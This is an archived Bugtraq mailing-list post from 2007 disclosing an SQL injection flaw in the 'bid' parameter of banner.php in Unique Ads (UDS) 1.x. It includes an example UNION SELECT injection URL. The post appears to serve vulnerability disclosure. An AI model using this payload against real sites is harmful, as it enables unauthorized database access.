[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SQL Injection in Unique Ads ( UDS )

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL Injection in Unique Ads ( UDS )
From: xx_hack_xx_2004@xxxxxxxxxxx
Date: 21 Jan 2007 02:21:25 -0000

Hello
Vulnerable : uds
Version: 1.x
web : http://www.egyptechno.com 

The bug :
http://example.com/uds/banner.php?bid=[SQL]

Example :
http://example.com/uds/banner.php?bid=-55%20union%20select%20null,null,null%20from%20uds


,,,,,,,
Discoverey By : Linux_Drox
www.LeZr.com

Best Regards ,,

Prev by Date: XSS in Guestbook ( v.4.00 beta )
Next by Date: cmsimple 2.7 Remote File Include
Previous by thread: XSS in Guestbook ( v.4.00 beta )
Next by thread: cmsimple 2.7 Remote File Include
Index(es):
- Date
- Thread